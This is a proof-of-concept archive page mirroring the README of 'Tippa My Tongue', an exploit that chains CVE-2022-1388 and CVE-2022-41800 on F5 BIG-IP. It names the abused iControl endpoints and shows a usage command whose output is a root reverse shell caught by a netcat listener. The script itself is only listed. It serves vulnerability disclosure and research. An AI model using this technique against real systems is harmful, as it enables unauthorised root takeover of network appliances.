Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
https://github.com/j-baines/tippa-my-tongue
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Description
F5 BIG-IP Exploit Using CVE-2022-1388 and CVE-2022-41800
Readme
# Tippa My Tongue

Tippa My Tongue is an exploit that uses CVE-2022-1388 and CVE-2022-41800 to establish a `root` reverse shell on F5 BIG-IP products. Most CVE-2022-1388 exploits achieve code execution using `/mgmt/tm/util/bash`. However, this exploit uses `/mgmt/shared/iapp/rpm-spec-creator`, followed by `/mgmt/shared/iapp/build-package`. This approach was first suggested by [Ron Bowes](https://github.com/rbowes-r7) in this AttackerKB [analysis](https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis). Although, to my knowledge, no one ever published a CVE-2022-1388 exploit that did just that.

For more details, read the [VulnCheck](https://vulncheck.com/blog/new-cve-2022-1388) writeup.

## Usage Example:

```
albinolobster@mournland:~/tippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194

   ▄▄▄▄▄▪   ▄▄▄· ▄▄▄· ▄▄▄·     • ▌ ▄ ·.  ▄· ▄
   •██  ██ ▐█ ▄█▐█ ▄█▐█ ▀█     ·██ ▐███▪▐█▪██
    ▐█.▪▐█· ██▀· ██▀·▄█▀▀█     ▐█ ▌▐▌▐█·▐█▌▐█▪
    ▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌    ██ ██▌▐█▌ ▐█▀·.
    ▀▀▀ ▀▀▀.▀   .▀    ▀  ▀     ▀▀  █▪▀▀▀  ▀ •
         ▄▄▄▄▄       ▐ ▄  ▄▄ • ▄• ▄▌▄▄▄ .
         •██  ▪     •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀·
          ▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄
          ▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌
          ▀▀▀  ▀█▄▀▪▀▀ █▪·▀▀▀▀  ▀▀▀  ▀▀▀

                 CVE-2022-1388
                 CVE-2022-41800

                       🦞

[+] Executing netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Sending initial request to rpm-spec-creator
[+] Sending exploit attempt request to build-package
Connection received on 10.9.49.191 47152
bash: no job control in this shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
pwd
/var/config/rest/node/tmp/BUILD
[@localhost:NO LICENSE:Standalone] BUILD # id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #
```

## Acknowledgements

* Ron Bowes: for discovering these endpoints and sharing them with the world
* [RHCP](https://www.youtube.com/watch?v=E1FNkf3MLKY): for being funky
File Snapshot

 [4.0K]  /data/pocs/ac45f073f30505b092bb8acd7f9d2af6224b743a
├── [1.0K]  LICENSE
├── [2.5K]  README.md
└── [5.4K]  tippa-my-tongue.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →